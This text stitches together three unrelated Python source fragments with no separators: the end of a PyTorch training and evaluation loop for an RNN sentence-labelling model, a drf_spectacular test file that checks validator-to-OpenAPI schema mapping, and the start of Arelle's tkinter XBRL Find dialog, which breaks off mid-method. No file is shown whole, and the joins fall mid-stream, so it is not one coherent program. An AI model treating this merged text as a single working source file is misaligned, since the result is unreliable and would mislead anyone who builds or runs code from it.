= 0 accuracy_sum = 0 accuracies = [] pbar = tqdm(train_data, total=len(train_data)) # Start training for iteration, (sentences, labels, textrank_labels) in enumerate(pbar): # Perform a train step loss, label_preds = train_step(sentences=sentences, labels=textrank_labels, encoder=encoder, decoder=decoder, attn=attn, optims=optims, criterion=criterion, teacher_forcing_ratio=teacher_forcing_ratio, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) accuracy_sum += accuracy losses.append(loss) loss_sum += loss mean_interval = 1000 if iteration <= mean_interval: pbar.set_postfix({'mean 
loss/accuracy': '{:.4f}, {:.4f}'.format(np.mean(losses), np.mean( accuracies))}) if iteration > mean_interval: pbar.set_postfix({'mean loss/accuracy (last {})'.format(mean_interval): '{:.4f}, {:.4f}'.format( np.mean(losses[-(mean_interval + 1):-1]), np.mean(accuracies[-(mean_interval + 1):-1]))}) if iteration % loss_save_interval == 0 and iteration != 0: loss_mean = loss_sum / loss_save_interval loss_means.append(loss_mean) accuracy_mean = accuracy_sum / loss_save_interval accuracy_means.append(accuracy_mean) loss_sum = 0 accuracy_sum = 0 tqdm.write('Train accuracy: {:.4f}\t\tTrain loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Set model to eval mode encoder.eval() decoder.eval() attn.eval() # Reset bookkeeping losses = [] accuracies = [] # Start evaluation on validation set for iteration, (sentences, labels, textrank_labels) in enumerate(valid_data): # Perform an eval step loss, label_preds = eval_step(sentences=sentences, labels=textrank_labels, encoder=encoder, decoder=decoder, attn=attn, criterion=criterion, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) losses.append(loss) tqdm.write( 'Validation accuracy: {:.4f}\tValidation loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Save ALL THE THINGS model_save_path = savedir + 'rnn_model_state_pretrain_epoch' + str((epoch + 1)) torch.save({ 'epoch': epoch + 1, 'final': False, 'enc_state_dict': encoder.state_dict(), 'dec_state_dict': decoder.state_dict(), 'att_state_dict': attn.state_dict(), 'optim_state_dicts': [optim.state_dict() for optim in optims] }, model_save_path) # Save losses/accuracies losses_accuracies = {'losses': loss_means, 'accuracies': accuracy_means} with open(savedir + 'loss_accuracy.json', 'w') as fh: json.dump(losses_accuracies, fh) print('Saved current model state & losses/accuracies.') # And now, for the real training: # If parameters from pretraining are given, load them into model if pretraining_parameters: print('Using parameters from pretraining.', flush=True) encoder.load_state_dict(pretraining_parameters['enc_state_dict']) decoder.load_state_dict(pretraining_parameters['dec_state_dict']) attn.load_state_dict(pretraining_parameters['att_state_dict']) # Always re-initialize the optimizers encoder_optim = torch.optim.Adam(encoder.parameters(), lr=lr) decoder_optim = torch.optim.Adam(decoder.parameters(), lr=lr) attn_optim = torch.optim.Adam(attn.parameters(), lr=lr) optims = [encoder_optim, decoder_optim, attn_optim] for epoch in range(epochs): print('\nEpoch {}'.format(epoch + 1)) print('Current time: {}'.format(time.strftime('%l:%M%p | %b %d'))) # Set model to train mode encoder.train() decoder.train() attn.train() # Bookkeeping losses = [] loss_sum = 0 accuracy_sum = 0 accuracies = [] pbar = tqdm(train_data, total=len(train_data)) # Start training for iteration, (sentences, labels, textrank_labels) in enumerate(pbar): # If a cotraining ratio is given, use textrank labels randomly according to ratio. 
if cotraining_ratio: use_textrank_labels = random.random() < cotraining_ratio if use_textrank_labels: labels = textrank_labels # Perform a train step loss, label_preds = train_step(sentences=sentences, labels=labels, encoder=encoder, decoder=decoder, attn=attn, optims=optims, criterion=criterion, teacher_forcing_ratio=teacher_forcing_ratio, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) accuracy_sum += accuracy losses.append(loss) loss_sum += loss mean_interval = 1000 if iteration <= mean_interval: pbar.set_postfix({'mean loss/accuracy': '{:.4f}, {:.4f}'.format(np.mean(losses), np.mean( accuracies))}) if iteration > mean_interval: pbar.set_postfix({'mean loss/accuracy (last {})'.format(mean_interval): '{:.4f}, {:.4f}'.format( np.mean(losses[-(mean_interval + 1):-1]), np.mean(accuracies[-(mean_interval + 1):-1]))}) if iteration % loss_save_interval == 0 and iteration != 0: loss_mean = loss_sum / loss_save_interval loss_means.append(loss_mean) accuracy_mean = accuracy_sum / loss_save_interval accuracy_means.append(accuracy_mean) loss_sum = 0 accuracy_sum = 0 tqdm.write('Train accuracy: {:.4f}\t\tTrain loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Set model to eval mode encoder.eval() decoder.eval() attn.eval() # Reset bookkeeping losses = [] accuracies = [] # Start evaluation on validation set for iteration, (sentences, labels, textrank_labels) in enumerate(valid_data): # Perform an eval step loss, label_preds = eval_step(sentences=sentences, labels=labels, encoder=encoder, decoder=decoder, attn=attn, criterion=criterion, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) losses.append(loss) tqdm.write('Validation accuracy: {:.4f}\tValidation loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Save ALL THE THINGS model_save_path = savedir + 'rnn_model_state_epoch' + str((epoch + 1)) torch.save({ 'epoch': epoch + 1, 'final': False, 'enc_state_dict': encoder.state_dict(), 'dec_state_dict': decoder.state_dict(), 'att_state_dict': attn.state_dict(), 'optim_state_dicts': [optim.state_dict() for optim in optims] }, model_save_path) # Save losses/accuracies losses_accuracies = {'losses': loss_means, 'accuracies': accuracy_means} with open(savedir + 'loss_accuracy.json', 'w') as fh: json.dump(losses_accuracies, fh) print('Saved current model state & losses/accuracies.') # Set model to eval mode encoder.eval() decoder.eval() attn.eval() # Reset bookkeeping losses = [] accuracies = [] # Start evaluation on validation set for iteration, (sentences, labels, textrank_labels) in enumerate(test_data): # Perform an eval step loss, label_preds = eval_step(sentences=sentences, labels=labels, encoder=encoder, decoder=decoder, attn=attn, criterion=criterion, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) losses.append(loss) print('\nTest accuracy: {:.4f}\t\tTest loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) print('\nSaving final model state & losses/accuracies...') # Save ALL THE THINGS model_save_path = savedir + 'rnn_model_state_final' torch.save({ 'epoch': None, 'final': True, 'enc_state_dict': encoder.state_dict(), 'dec_state_dict': decoder.state_dict(), 'att_state_dict': attn.state_dict(), 'optim_state_dicts': [optim.state_dict() for optim in optims] }, model_save_path) # Save losses/accuracies losses_accuracies = {'losses': loss_means, 
'accuracies': accuracy_means} with open(savedir + 'loss_accuracy.json', 'w') as fh: json.dump(losses_accuracies, fh) print('Finished saving!') print('Finish time: {}'.format(time.strftime('%l:%M%p | %b %d'))) def eval_step(sentences, labels, encoder, decoder, attn, criterion, output_size, USE_CUDA): # Turn x and y into Variables sentences = Variable(sentences, volatile=True).view(-1, sentences.size(2)) labels = Variable(torch.LongTensor(labels), volatile=True).view(-1) # Initialize zero vector BOD_vector = Variable(torch.zeros((1, 300))) # Initialize the label prediction as uniform ditribution over output dimensions label_pred = Variable(torch.FloatTensor([1] * output_size) / output_size).view(1, -1) # Initialize loss loss = Variable(torch.zeros(1)) if USE_CUDA: sentences = sentences.cuda() labels = labels.cuda() label_pred = label_pred.cuda() loss = loss.cuda() BOD_vector = BOD_vector.cuda() encoder_outputs, encoder_hidden = encoder(sentences) decoder_hidden = encoder_hidden # For decoding, add the beginning-of-document vector (which is for now just the 0-vector) to the sequence sentences = torch.cat((BOD_vector, sentences), 0) label_preds = np.zeros((len(encoder_outputs))).astype(int) # Now we iterate over the decoder steps # For evaluation, we do not use teacher forcing for i, decoding_step in enumerate(encoder_outputs): output, decoder_hidden = decoder(label_pred, sentences[i], decoder_hidden) label_pred, output = attn(output, encoder_outputs[i]) loss += criterion(output, labels[i]) label_preds[i] = label_pred.max(-1)[1].data[0] # Compute mean loss loss /= len(encoder_outputs) return loss.data[0], label_preds def train_step(sentences, labels, encoder, decoder, attn, optims, criterion, teacher_forcing_ratio, output_size, USE_CUDA): # Turn x and y into Variables sentences = Variable(sentences).view(-1, sentences.size(2)) labels = Variable(torch.LongTensor(labels)).view(-1) # Make labels one-hot and append 0-label, for teacher forcing input label_list = labels.data.numpy() true_labels = np.zeros((len(label_list), output_size)) true_labels[np.arange(len(label_list)), label_list] = 1 # Append initial dummy label (= uniform distribution) first_label = np.array([1] * output_size) / output_size true_labels = np.vstack((first_label, true_labels)) # Make true labels a Variable true_labels = Variable(torch.from_numpy(true_labels).float()).view(-1, 1, output_size) # Initialize zero vector BOD_vector = Variable(torch.zeros((1, 300))) # Initialize the label prediction as uniform ditribution over output dimensions label_pred = Variable(torch.FloatTensor([1] * output_size) / output_size).view(1, -1) # Initialize loss loss = Variable(torch.zeros(1)) if USE_CUDA: sentences = sentences.cuda() labels = labels.cuda() label_pred = label_pred.cuda() loss = loss.cuda() BOD_vector = BOD_vector.cuda() true_labels = true_labels.cuda() # Reset gradients for optim in optims: optim.zero_grad() encoder_outputs, encoder_hidden = encoder(sentences) decoder_hidden = encoder_hidden # For decoding, add the beginning-of-document vector (which is for now just the 0-vector) to the sequence sentences = torch.cat((BOD_vector, sentences), 0) label_preds = np.zeros((len(encoder_outputs))).astype(int) # Now we iterate over the decoder steps for i, decoding_step in enumerate(encoder_outputs): # Decide whether predicted or true labels are used use_teacher_forcing = random.random() < teacher_forcing_ratio if use_teacher_forcing: output, decoder_hidden = decoder(true_labels[i], sentences[i], decoder_hidden) else: output, 
decoder_hidden = decoder(label_pred, sentences[i], decoder_hidden) label_pred, output = attn(output, encoder_outputs[i]) loss += criterion(output, labels[i]) label_preds[i] = label_pred.max(-1)[1].data[0] # Compute mean loss loss /= len(encoder_outputs) loss.backward() # Clip gradients, just to be sure clip = 5 torch.nn.utils.clip_grad_norm(encoder.parameters(), clip) torch.nn.utils.clip_grad_norm(decoder.parameters(), clip) torch.nn.utils.clip_grad_norm(attn.parameters(), clip) # Run optimization step for optim in optims: optim.step() return loss.data[0], label_preds
import sys from datetime import timedelta from unittest import mock import pytest from django.contrib.auth import validators as auth_validators from django.contrib.postgres import validators as postgres_validators from django.core import validators from django.urls import path from rest_framework import serializers from rest_framework.decorators import api_view from drf_spectacular.utils import extend_schema from tests import assert_schema, generate_schema @mock.patch('rest_framework.settings.api_settings.COERCE_DECIMAL_TO_STRING', False) def test_validators(): class XSerializer(serializers.Serializer): # Note that these fields intentionally use basic field types to ensure that we detect from the validator only. # The following only apply for `string` type: char_email = serializers.CharField(validators=[validators.EmailValidator()]) char_url = serializers.CharField(validators=[validators.URLValidator()]) char_regex = serializers.CharField(validators=[validators.RegexValidator(r'\w+')]) char_max_length = serializers.CharField(validators=[validators.MaxLengthValidator(200)]) char_min_length = serializers.CharField(validators=[validators.MinLengthValidator(100)]) # The following only apply for `integer` and `number` types: float_max_value = serializers.FloatField(validators=[validators.MaxValueValidator(200.0)]) float_min_value = serializers.FloatField(validators=[validators.MinValueValidator(100.0)]) float_decimal = serializers.FloatField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) integer_max_value = serializers.IntegerField(validators=[validators.MaxValueValidator(200)]) integer_min_value = serializers.IntegerField(validators=[validators.MinValueValidator(100)]) integer_decimal = serializers.FloatField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) decimal_max_value = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MaxValueValidator(200)], ) decimal_min_value = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MinValueValidator(100)], ) decimal_decimal = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # The following only apply for `array` type: list_max_length = serializers.ListField(validators=[validators.MaxLengthValidator(200)]) list_min_length = serializers.ListField(validators=[validators.MinLengthValidator(100)]) # The following only apply for `object` type: dict_max_length = serializers.DictField(validators=[validators.MaxLengthValidator(200)]) dict_min_length = serializers.DictField(validators=[validators.MinLengthValidator(100)]) # Explicit test for rest_framework.fields.DurationField: age = serializers.DurationField(validators=[ validators.RegexValidator(r'^P\d+Y$'), validators.MaxLengthValidator(5), validators.MinLengthValidator(3), ]) # Tests for additional subclasses already handled by their superclass: array_max_length = serializers.ListField(validators=[postgres_validators.ArrayMaxLengthValidator(200)]) array_min_length = serializers.ListField(validators=[postgres_validators.ArrayMinLengthValidator(100)]) ascii_username = serializers.CharField(validators=[auth_validators.ASCIIUsernameValidator()]) unicode_username = serializers.CharField(validators=[auth_validators.UnicodeUsernameValidator()]) file_extension = serializers.CharField(validators=[validators.FileExtensionValidator(['.jpg', '.png'])]) integer_string = 
serializers.CharField(validators=[validators.integer_validator]) integer_list = serializers.CharField(validators=[validators.validate_comma_separated_integer_list]) class YSerializer(serializers.Serializer): # These validators are unsupported for the `string` type: char_max_value = serializers.CharField(validators=[validators.MaxValueValidator(200)]) char_min_value = serializers.CharField(validators=[validators.MinValueValidator(100)]) char_decimal = serializers.CharField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # These validators are unsupported for the `integer` and `number` types: float_email = serializers.FloatField(validators=[validators.EmailValidator()]) float_url = serializers.FloatField(validators=[validators.URLValidator()]) float_regex = serializers.FloatField(validators=[validators.RegexValidator(r'\w+')]) float_max_length = serializers.FloatField(validators=[validators.MaxLengthValidator(200)]) float_min_length = serializers.FloatField(validators=[validators.MinLengthValidator(100)]) integer_email = serializers.IntegerField(validators=[validators.EmailValidator()]) integer_url = serializers.IntegerField(validators=[validators.URLValidator()]) integer_regex = serializers.IntegerField(validators=[validators.RegexValidator(r'\w+')]) integer_max_length = serializers.IntegerField(validators=[validators.MaxLengthValidator(200)]) integer_min_length = serializers.IntegerField(validators=[validators.MinLengthValidator(100)]) decimal_email = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.EmailValidator()], ) decimal_url = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.URLValidator()], ) decimal_regex = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.RegexValidator(r'\w+')], ) decimal_max_length = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MaxLengthValidator(200)], ) decimal_min_length = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MinLengthValidator(100)], ) # These validators are unsupported for the `array` type: list_email = serializers.ListField(validators=[validators.EmailValidator()]) list_url = serializers.ListField(validators=[validators.URLValidator()]) list_regex = serializers.ListField(validators=[validators.RegexValidator(r'\w+')]) list_max_value = serializers.ListField(validators=[validators.MaxValueValidator(200)]) list_min_value = serializers.ListField(validators=[validators.MinValueValidator(100)]) list_decimal = serializers.ListField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # These validators are unsupported for the `object` type: dict_email = serializers.DictField(validators=[validators.EmailValidator()]) dict_url = serializers.DictField(validators=[validators.URLValidator()]) dict_regex = serializers.DictField(validators=[validators.RegexValidator(r'\w+')]) dict_max_value = serializers.DictField(validators=[validators.MaxValueValidator(200)]) dict_min_value = serializers.DictField(validators=[validators.MinValueValidator(100)]) dict_decimal = serializers.DictField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # These validators are unsupported for the `boolean` type: boolean_email = serializers.BooleanField(validators=[validators.EmailValidator()]) boolean_url = serializers.BooleanField(validators=[validators.URLValidator()]) boolean_regex = 
serializers.BooleanField(validators=[validators.RegexValidator(r'\w+')]) boolean_max_length = serializers.BooleanField(validators=[validators.MaxLengthValidator(200)]) boolean_min_length = serializers.BooleanField(validators=[validators.MinLengthValidator(100)]) boolean_max_value = serializers.BooleanField(validators=[validators.MaxValueValidator(200)]) boolean_min_value = serializers.BooleanField(validators=[validators.MinValueValidator(100)]) boolean_decimal = serializers.BooleanField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # Explicit test for rest_framework.fields.DurationField: duration_max_value = serializers.DurationField(validators=[validators.MaxValueValidator(200)]) duration_min_value = serializers.DurationField(validators=[validators.MinValueValidator(100)]) duration_decimal = serializers.DurationField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func_x(request, format=None): pass # pragma: no cover @extend_schema(request=YSerializer, responses=YSerializer) @api_view(['POST']) def view_func_y(request, format=None): pass # pragma: no cover schema = generate_schema(None, patterns=[path('x', view_func_x), path('y', view_func_y)]) if sys.version_info < (3, 7): # In Python < 3.7, re.escape() escapes more characters than necessary. field = schema['components']['schemas']['X']['properties']['integer_list'] field['pattern'] = field['pattern'].replace(r'\,', ',') assert_schema(schema, 'tests/test_validators.yml') def test_nested_validators(): class XSerializer(serializers.Serializer): list_field = serializers.ListField( child=serializers.IntegerField( validators=[validators.MaxValueValidator(999)], ), validators=[validators.MaxLengthValidator(5)], ) dict_field = serializers.DictField( child=serializers.IntegerField( validators=[validators.MaxValueValidator(999)], ), ) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover schema = generate_schema('x', view_function=view_func) properties = schema['components']['schemas']['X']['properties'] assert properties['list_field']['maxItems'] == 5 assert properties['list_field']['items']['maximum'] == 999 assert properties['dict_field']['additionalProperties']['maximum'] == 999 @pytest.mark.parametrize('instance,expected', [ ( serializers.DictField(validators=[validators.MaxLengthValidator(150), validators.MaxLengthValidator(200)]), {'type': 'object', 'additionalProperties': {}, 'maxProperties': 150}, ), ( serializers.DictField(validators=[validators.MinLengthValidator(150), validators.MinLengthValidator(100)]), {'type': 'object', 'additionalProperties': {}, 'minProperties': 150}, ), ( serializers.ListField(max_length=150, validators=[validators.MaxLengthValidator(200)]), {'type': 'array', 'items': {}, 'maxItems': 150}, ), ( serializers.ListField(min_length=150, validators=[validators.MinLengthValidator(100)]), {'type': 'array', 'items': {}, 'minItems': 150}, ), ( serializers.ListField(max_length=200, validators=[validators.MaxLengthValidator(150)]), {'type': 'array', 'items': {}, 'maxItems': 150}, ), ( serializers.ListField(min_length=100, validators=[validators.MinLengthValidator(150)]), {'type': 'array', 'items': {}, 'minItems': 150}, ), ( serializers.ListField(validators=[validators.MaxLengthValidator(150), validators.MaxLengthValidator(200)]), {'type': 'array', 'items': {}, 'maxItems': 150}, ), ( 
serializers.ListField(validators=[validators.MinLengthValidator(150), validators.MinLengthValidator(100)]), {'type': 'array', 'items': {}, 'minItems': 150}, ), ( serializers.CharField(max_length=150, validators=[validators.MaxLengthValidator(200)]), {'type': 'string', 'maxLength': 150}, ), ( serializers.CharField(min_length=150, validators=[validators.MinLengthValidator(100)]), {'type': 'string', 'minLength': 150}, ), ( serializers.CharField(max_length=200, validators=[validators.MaxLengthValidator(150)]), {'type': 'string', 'maxLength': 150}, ), ( serializers.CharField(min_length=100, validators=[validators.MinLengthValidator(150)]), {'type': 'string', 'minLength': 150}, ), ( serializers.CharField(validators=[validators.MaxLengthValidator(150), validators.MaxLengthValidator(200)]), {'type': 'string', 'maxLength': 150}, ), ( serializers.CharField(validators=[validators.MinLengthValidator(150), validators.MinLengthValidator(100)]), {'type': 'string', 'minLength': 150}, ), ( serializers.IntegerField(max_value=150, validators=[validators.MaxValueValidator(200)]), {'type': 'integer', 'maximum': 150}, ), ( serializers.IntegerField(min_value=150, validators=[validators.MinValueValidator(100)]), {'type': 'integer', 'minimum': 150}, ), ( serializers.IntegerField(max_value=200, validators=[validators.MaxValueValidator(150)]), {'type': 'integer', 'maximum': 150}, ), ( serializers.IntegerField(min_value=100, validators=[validators.MinValueValidator(150)]), {'type': 'integer', 'minimum': 150}, ), ( serializers.IntegerField(validators=[validators.MaxValueValidator(150), validators.MaxValueValidator(200)]), {'type': 'integer', 'maximum': 150}, ), ( serializers.IntegerField(validators=[validators.MinValueValidator(150), validators.MinValueValidator(100)]), {'type': 'integer', 'minimum': 150}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MaxValueValidator(50)]), {'type': 'number', 'format': 'double', 'maximum': 50, 'minimum': -100, 'exclusiveMinimum': True}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MinValueValidator(-50)]), {'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -50, 'exclusiveMaximum': True}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MaxValueValidator(150)]), {'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMinimum': True}, ), ( serializers.DecimalField(max_digits=3, decimal_places=1, validators=[validators.MinValueValidator(-150)]), {'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMaximum': True}, ), ( serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.DecimalValidator(max_digits=3, decimal_places=1)], ), { 'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMaximum': True, 'exclusiveMinimum': True, }, ), ( serializers.DecimalField( max_digits=3, decimal_places=1, validators=[validators.DecimalValidator(max_digits=4, decimal_places=1)], ), { 'type': 'number', 'format': 'double', 'maximum': 100, 'minimum': -100, 'exclusiveMaximum': True, 'exclusiveMinimum': True, }, ), ( serializers.DecimalField( max_digits=3, decimal_places=1, validators=[validators.DecimalValidator(max_digits=2, decimal_places=1), validators.MaxValueValidator(5)], ), {'type': 'number', 'format': 'double', 'maximum': 5, 'minimum': -10, 'exclusiveMinimum': True}, ), ( serializers.DecimalField( max_digits=3, decimal_places=1, 
validators=[validators.DecimalValidator(max_digits=2, decimal_places=1), validators.MinValueValidator(-5)], ), {'type': 'number', 'format': 'double', 'maximum': 10, 'minimum': -5, 'exclusiveMaximum': True}, ), ]) @mock.patch('rest_framework.settings.api_settings.COERCE_DECIMAL_TO_STRING', False) def test_validation_constrained(instance, expected): class XSerializer(serializers.Serializer): field = instance @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover schema = generate_schema('x', view_function=view_func) assert schema['components']['schemas']['X']['properties']['field'] == expected def test_timedelta_in_validator(): class XSerializer(serializers.Serializer): field = serializers.DurationField( validators=[validators.MaxValueValidator(timedelta(seconds=3600))], ) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover # `DurationField` values and `timedelta` serialize to `string` type so `maximum` is invalid. schema = generate_schema('x', view_function=view_func) assert 'maximum' not in schema['components']['schemas']['X']['properties']['field'] @pytest.mark.parametrize('pattern,expected', [ (r'\xff', r'\u00ff'), # Unify escape characters. (r'\Ato\Z', r'^to$'), # Switch to ECMA anchors. ]) def test_regex_validator_tweaks(pattern, expected): class XSerializer(serializers.Serializer): field = serializers.CharField(validators=[validators.RegexValidator(pattern)]) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func(request, format=None): pass # pragma: no cover schema = generate_schema('x', view_function=view_func) field = schema['components']['schemas']['X']['properties']['field'] assert field['pattern'] == expected
''' Created on May 1, 2011 @author: Mark V Systems Limited (c) Copyright 2011 Mark V Systems Limited, All rights reserved. ''' from tkinter import Toplevel, N, S, E, W, messagebox try: from tkinter.ttk import Frame, Button except ImportError: from ttk import Frame, Button try: import regex as re except ImportError: import re from arelle.UiUtil import gridHdr, gridCell, gridCombobox, label, checkbox, radiobutton from arelle.CntlrWinTooltip import ToolTip from arelle import ModelDocument, XPathContext, XPathParser, XmlUtil from arelle.ModelDtsObject import ModelConcept from arelle.ModelInstanceObject import ModelFact from arelle.ModelRssItem import ModelRssItem from arelle.ModelFormulaObject import Trace ''' caller checks accepted, if True, caller retrieves url ''' reMetaChars = '[]\\^$.|?*+(){}' newFindOptions = { "direction": "down", "exprType": "text", "all": False, "conceptLabel": False, "conceptName": False, "conceptSubs": False, "conceptPer": False, "conceptBal": False, "factLabel": False, "factName": False, "factValue": False, "factCntx": False, "factUnit": False, "messagesLog": False, "priorExpressions": [], "geometry": None } def find(mainWin): dialog = DialogFind(mainWin, mainWin.config.setdefault("findOptions", newFindOptions)) class DialogFind(Toplevel): def __init__(self, mainWin, options): parent = mainWin.parent super(DialogFind, self).__init__(parent) self.parent = parent self.modelManager = mainWin.modelManager self.modelXbrl = None # set when Find pressed, this blocks next prematurely if options is None: options = newFindOptions self.options = options parentGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", parent.geometry()) dialogW = int(parentGeometry.group(1)) dialogH = int(parentGeometry.group(2)) dialogX = int(parentGeometry.group(3)) dialogY = int(parentGeometry.group(4)) self.accepted = False self.transient(self.parent) self.title(_("Find")) self.objsList = [] # next may be tried before anything is found frame = Frame(self) # load grid findLabel = gridHdr(frame, 1, 0, "Find:", anchor="w") findLabel.grid(padx=8) self.cbExpr = gridCombobox(frame, 1, 1, values=options["priorExpressions"]) self.cbExpr.grid(columnspan=3, padx=8) ToolTip(self.cbExpr, text=_("Enter expression to find, or select from combo box drop down history list."), wraplength=240) y = 2 # checkbox entries label(frame, 1, y, "Direction:") label(frame, 1, y + 3, "Match:") scopeLabel = label(frame, 2, y, "Scope:") ToolTip(scopeLabel, text=_("Scope for an XBRL document (instance or DTS). " "For an RSS Feed, all properties are matched. "), wraplength=240) rbUp = radiobutton(frame, 1, y+1, "Up", "up", "direction") ToolTip(rbUp, text=_("Find/Next up (on screen) from last to first match."), wraplength=240) rbDn = radiobutton(frame, 1, y+2, "Down", "down", "direction", rbUp.valueVar) ToolTip(rbDn, text=_("Find/Next down (on screen) from first to last match."), wraplength=240) rbText = radiobutton(frame, 1, y+4, "Text (ignore case)", "text", "exprType") ToolTip(rbText, text=_("Expression is a set of characters to match, ignoring case. " "The match may occur anywhere within the scope. "), wraplength=360) rbRegex = radiobutton(frame, 1, y+5, "Regular expression", "regex", "exprType", rbText.valueVar) ToolTip(rbRegex, text=_('A regular expression to match, anywhere in the scope, ignoring case. ' 'For example, "cash" would match cash anywhere in a string (like cash on hand), ' 'whereas "^cash$" would match a full string to only contain cash. ' 'Use regular expression metacharacters, e.g., "." 
for any single character, ' '".*" for any number of wild characters, .{3} for exactly 3 wild characters. '), wraplength=360) rbXPath = radiobutton(frame, 1, y+6, "XPath 2 expression", "xpath", "exprType", rbText.valueVar) ToolTip(rbXPath, text=_('An XPath 2 expression, where the context element, ".", is a candidate concept QName, if any concept scope is checked, ' 'and a candidate fact item, if any fact scope is checked. The XPath 2 functions do not need an "fn:" prefix (but it is defined). ' 'The XBRL Functions Registry functions do require an "xfi:" prefix. Constructors require an "xs:" prefix. ' 'The expression is considered "matched" for the candidate concept QNames or fact items where the effective boolean value of the expression is "true()". '), wraplength=360) self.optionControls = ( rbUp, rbDn, rbText, rbRegex, rbXPath, #checkbox(frame, 2, y + 1, "All", "all"), checkbox(frame, 2, y + 1, "Concept label", "conceptLabel"), checkbox(frame, 2, y + 2, " name", "conceptName"), checkbox(frame, 2, y + 3, " type", "conceptType"), checkbox(frame, 2, y + 4, " subs group", "conceptSubs"), checkbox(frame, 2, y + 5, " period type", "conceptPer"), checkbox(frame, 2, y + 6, " balance", "conceptBal"), checkbox(frame, 3, y + 1, "Fact label", "factLabel"), checkbox(frame, 3, y + 2, " name", "factName"), checkbox(frame, 3, y + 3, " value", "factValue"), checkbox(frame, 3, y + 4, " context", "factCntx"), checkbox(frame, 3, y + 5, " unit", "factUnit"), checkbox(frame, 3, y + 6, "Messages", "messagesLog"), # Note: if adding to this list keep Finder.FindOptions in sync ) y += 7 resultLabel = gridHdr(frame, 1, y, "Result:", anchor="w") resultLabel.grid(padx=8) self.resultText = gridCell(frame, 1, y + 1) self.resultText.grid(columnspan=3, padx=8) self.resultText.config(state="readonly") y += 2 mainWin.showStatus(None) buttonFrame = Frame(frame) buttonFrame.grid(columnspan=4, sticky=E, padx=8) findButton = Button(buttonFrame, text=_("Find"), width=12, command=self.find) ToolTip(findButton, text=_('Compile (if regular expression or XPath 2), and find first match (if down direction) or last match (if up direction). '), wraplength=240) nextButton = Button(buttonFrame, text=_("Next"), width=12, command=self.next) ToolTip(nextButton, text=_('Advance to the next matched object (in selected direction). '), wraplength=240) closeButton = Button(buttonFrame, text=_("Close"), width=12, command=self.close) ToolTip(closeButton, text=_('Close the find dialog. 
'), wraplength=240) findButton.grid(row=1, column=1, pady=3) nextButton.grid(row=1, column=2, pady=3) closeButton.grid(row=1, column=3, padx=3) frame.grid(row=0, column=0, sticky=(N,S,E,W)) frame.columnconfigure(1, weight=1) frame.columnconfigure(2, weight=1) frame.columnconfigure(3, weight=1) window = self.winfo_toplevel() window.columnconfigure(0, weight=1) if self.options["geometry"]: self.geometry(self.options["geometry"]) else: self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100)) #self.bind("<Return>", self.ok) #self.bind("<Escape>", self.close) self.protocol("WM_DELETE_WINDOW", self.close) # make this dialog non-modal self.focus_set() #self.grab_set() #self.wait_window(self) def setOptions(self): # set formula options for optionControl in self.optionControls: self.options[optionControl.attr] = optionControl.value def find(self, event=None): self.setOptions() self.accepted = True # self.close() docType = self.modelManager.modelXbrl.modelDocument.type if self.modelManager.modelXbrl else None if self.options["messagesLog"]: if docType == ModelDocument.Type.RSSFEED and self.options["exprType"] == "xpath": messagebox.showerror(_("Find cannot be completed"), _("XPath matching is not available for searching messages, please choose text or regular expression. "), parent=self) return else: if not self.modelManager.modelXbrl or not docType in ( ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.RSSFEED): messagebox.showerror(_("Find cannot be completed"), _("Find requires an opened DTS or RSS Feed"), parent=self.parent) return if docType == ModelDocument.Type.RSSFEED and self.options["exprType"] == "xpath": messagebox.showerror(_("Find cannot be completed"), _("XPath matching is not available for an RSS Feed, please choose text or regular expression. 
